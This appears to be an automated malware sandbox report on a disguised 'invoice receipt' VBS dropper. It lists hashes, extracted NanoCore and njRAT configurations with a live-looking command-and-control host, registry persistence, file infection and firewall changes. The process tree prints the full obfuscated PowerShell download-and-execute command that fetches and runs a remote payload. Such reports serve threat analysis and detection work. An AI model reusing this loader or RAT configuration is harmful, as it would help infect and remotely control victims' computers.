Analysis
-
max time kernel
4265099s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
14-01-2022 16:27
Static task
static1
Behavioral task
behavioral1
Sample
Y1K3875FX_INV0ICE_RECEIPT.vbs
Resource
win7-en-20211208
General
-
Target
Y1K3875FX_INV0ICE_RECEIPT.vbs
-
Size
4KB
-
MD5
eabf87aa6e88a700b48fdc11fd56d034
-
SHA1
02aa868a130881a5dc409a7d06d943f7ae7f0654
-
SHA256
a52cb2c09e66deb221d1db56e62b67138e5e3de516966481f789cd48dcacbe66
-
SHA512
46042d15120eccc2e645a11495715f1804b2923105b698e8fcacf6111a36a3b29aa30e5416c47db83ee4d49bd80a9b7b28751a5b591d4223c01f08b9cc86493a
Malware Config
Extracted
nanocore
1.2.2.0
childhome4100.duckdns.org:4100
915339bc-81e8-473d-98ef-3cba5bb4ebc8
-
activate_away_mode
true
-
backup_connection_host
childhome4100.duckdns.org
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2021-10-26T14:02:15.903896736Z
-
bypass_user_account_control
true
- bypass_user_account_control_data
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
4100
-
default_group
father of child
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
915339bc-81e8-473d-98ef-3cba5bb4ebc8
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
childhome4100.duckdns.org
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
true
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Extracted
njrat
1.9
HacKed
Microsoft.Exe
-
reg_key
Microsoft.Exe
Signatures
-
Detect Neshta Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/3864-144-0x00000000004080E4-mapping.dmp family_neshta behavioral2/memory/3864-143-0x0000000000400000-0x000000000041B000-memory.dmp family_neshta behavioral2/memory/3864-148-0x0000000000400000-0x000000000041B000-memory.dmp family_neshta -
Modifies system executable filetype association 2 TTPs 1 IoCs
Processes:
aspnet_compiler.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" aspnet_compiler.exe -
Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 20 536 powershell.exe 39 536 powershell.exe -
Modifies Windows Firewall 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
aspnet_compiler.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft.Exe = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe\" .." aspnet_compiler.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft.Exe = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe\" .." aspnet_compiler.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
powershell.exedescription pid process target process PID 536 set thread context of 3812 536 powershell.exe aspnet_compiler.exe PID 536 set thread context of 3864 536 powershell.exe aspnet_compiler.exe PID 536 set thread context of 3304 536 powershell.exe aspnet_compiler.exe -
Drops file in Program Files directory 64 IoCs
Processes:
aspnet_compiler.exedescription ioc process File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\NOTIFI~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\WINDOW~2\wab.exe aspnet_compiler.exe File opened for modification C:\PROGRA~3\Adobe\Setup\{AC76B~1\setup.exe aspnet_compiler.exe File opened for modification C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmpshare.exe aspnet_compiler.exe File opened for modification C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\COOKIE~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GOF5E2~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\MicrosoftEdgeUpdate.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\MOZILL~1\UNINST~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\WINDOW~4\setup_wm.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13153~1.55\MICROS~4.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\WINDOW~2\wabmig.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmpconfig.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\WI8A19~1\ImagingDevices.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\IDENTI~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\WINDOW~3\ACCESS~1\wordpad.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\Download\{F3C4F~1\13153~1.55\MICROS~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\PWAHEL~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13153~1.55\MICROS~3.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13153~1.55\MIA062~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\armsvc.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\INTERN~1\ieinstal.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\ELEVAT~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmlaunch.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jucheck.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GO664E~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GOBD5D~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\PWAHEL~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmplayer.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~4.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Google\Update\DISABL~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~2.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmprph.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\INTERN~1\iexplore.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\INSTAL~1\setup.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~3.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\INTERN~1\ExtExport.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\BHO\IE_TO_~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13153~1.55\MI9C33~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE aspnet_compiler.exe -
Drops file in Windows directory 1 IoCs
Processes:
aspnet_compiler.exedescription ioc process File opened for modification C:\Windows\svchost.com aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
MusNotification.exedescription ioc process Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MusNotification.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz MusNotification.exe -
Modifies registry class 1 IoCs
Processes:
aspnet_compiler.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" aspnet_compiler.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exeaspnet_compiler.exepid process 536 powershell.exe 536 powershell.exe 536 powershell.exe 536 powershell.exe 536 powershell.exe 536 powershell.exe 3812 aspnet_compiler.exe 3812 aspnet_compiler.exe 3812 aspnet_compiler.exe 3812 aspnet_compiler.exe 3812 aspnet_compiler.exe 3812 aspnet_compiler.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
aspnet_compiler.exepid process 3812 aspnet_compiler.exe -
Suspicious use of AdjustPrivilegeToken 15 IoCs
Processes:
powershell.exeMusNotification.exeaspnet_compiler.exeaspnet_compiler.exedescription pid process Token: SeDebugPrivilege 536 powershell.exe Token: SeShutdownPrivilege 2292 MusNotification.exe Token: SeCreatePagefilePrivilege 2292 MusNotification.exe Token: SeDebugPrivilege 3812 aspnet_compiler.exe Token: SeDebugPrivilege 3304 aspnet_compiler.exe Token: 33 3304 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 3304 aspnet_compiler.exe Token: 33 3304 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 3304 aspnet_compiler.exe Token: 33 3304 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 3304 aspnet_compiler.exe Token: 33 3304 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 3304 aspnet_compiler.exe Token: 33 3304 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 3304 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 38 IoCs
Processes:
WScript.exepowershell.exeaspnet_compiler.exedescription pid process target process PID 3088 wrote to memory of 536 3088 WScript.exe powershell.exe PID 3088 wrote to memory of 536 3088 WScript.exe powershell.exe PID 536 wrote to memory of 3812 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 3812 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 3812 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 3812 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 3812 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 3812 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 3812 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 3812 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 4060 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 4060 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 4060 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 3864 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 3864 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 3864 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 3864 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 3864 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 3864 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 3864 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 3864 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 3864 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 3864 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 3864 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 3584 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 3584 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 3584 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 3304 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 3304 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 3304 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 3304 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 3304 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 3304 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 3304 536 powershell.exe aspnet_compiler.exe PID 536 wrote to memory of 3304 536 powershell.exe aspnet_compiler.exe PID 3304 wrote to memory of 3248 3304 aspnet_compiler.exe netsh.exe PID 3304 wrote to memory of 3248 3304 aspnet_compiler.exe netsh.exe PID 3304 wrote to memory of 3248 3304 aspnet_compiler.exe netsh.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Y1K3875FX_INV0ICE_RECEIPT.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://swmen.com/vet/PS1NAIO.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePlace('------',''),'------I------`e------`X(------Ne------'.RePlace('------',''));$HBBBBB = ($HBBB -Join '')|InVoke-exPressioN2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- Modifies system executable filetype association
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE4⤵
-
C:\Windows\system32\MusNotification.exeC:\Windows\system32\MusNotification.exe1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\PROGRA~3\314694~1\MICROS~1.EXEMD5
fda8c8f2a4e100afb14c13dfcbcab2d2
SHA119dfd86294c4a525ba21c6af77681b2a9bbecb55
SHA25699a2c778c9a6486639d0aff1a7d2d494c2b0dc4c7913ebcb7bfea50a2f1d0b09
SHA51294f0ace37cae77be9935cf4fc8aaa94691343d3b38de5e16c663b902c220bff513cd02256c7af2d815a23dd30439582ddbb0880009c76bbf36ff8fbc1a6ddc18
-
memory/536-136-0x0000023AB3E30000-0x0000023AB3E32000-memory.dmpFilesize
8KB
-
memory/536-132-0x0000023AB3E30000-0x0000023AB3E32000-memory.dmpFilesize
8KB
-
memory/536-133-0x0000023AB3E30000-0x0000023AB3E32000-memory.dmpFilesize
8KB
-
memory/536-134-0x0000023AB3E30000-0x0000023AB3E32000-memory.dmpFilesize
8KB
-
memory/536-135-0x0000023AB5870000-0x0000023AB5892000-memory.dmpFilesize
136KB
-
memory/536-147-0x0000023AB3E30000-0x0000023AB3E32000-memory.dmpFilesize
8KB
-
memory/536-137-0x0000023AB3E30000-0x0000023AB3E32000-memory.dmpFilesize
8KB
-
memory/536-138-0x0000023AB3F00000-0x0000023AB3F02000-memory.dmpFilesize
8KB
-
memory/536-139-0x0000023AB3F03000-0x0000023AB3F05000-memory.dmpFilesize
8KB
-
memory/536-140-0x0000023AB3F06000-0x0000023AB3F08000-memory.dmpFilesize
8KB
-
memory/536-131-0x0000023AB3E30000-0x0000023AB3E32000-memory.dmpFilesize
8KB
-
memory/536-130-0x0000000000000000-mapping.dmp
-
memory/3248-161-0x0000000000000000-mapping.dmp
-
memory/3304-163-0x0000000005680000-0x0000000005C24000-memory.dmpFilesize
5.6MB
-
memory/3304-146-0x000000000040BBCE-mapping.dmp
-
memory/3304-145-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/3304-164-0x00000000061E0000-0x0000000006246000-memory.dmpFilesize
408KB
-
memory/3304-154-0x00000000055E0000-0x000000000567C000-memory.dmpFilesize
624KB
-
memory/3304-158-0x0000000005680000-0x0000000005712000-memory.dmpFilesize
584KB
-
memory/3304-150-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/3304-165-0x0000000005C20000-0x0000000005C2A000-memory.dmpFilesize
40KB
-
memory/3304-152-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/3304-155-0x0000000005C30000-0x00000000061D4000-memory.dmpFilesize
5.6MB
-
memory/3812-157-0x00000000056B0000-0x000000000574C000-memory.dmpFilesize
624KB
-
memory/3812-153-0x0000000005B20000-0x00000000060C4000-memory.dmpFilesize
5.6MB
-
memory/3812-156-0x0000000005610000-0x00000000056A2000-memory.dmpFilesize
584KB
-
memory/3812-151-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/3812-149-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/3812-159-0x0000000005570000-0x0000000005B14000-memory.dmpFilesize
5.6MB
-
memory/3812-160-0x00000000055D0000-0x00000000055DA000-memory.dmpFilesize
40KB
-
memory/3812-162-0x0000000006EC0000-0x0000000006F26000-memory.dmpFilesize
408KB
-
memory/3812-142-0x000000000041E792-mapping.dmp
-
memory/3812-141-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/3864-148-0x0000000000400000-0x000000000041B000-memory.dmpFilesize
108KB
-
memory/3864-143-0x0000000000400000-0x000000000041B000-memory.dmpFilesize
108KB
-
memory/3864-144-0x00000000004080E4-mapping.dmp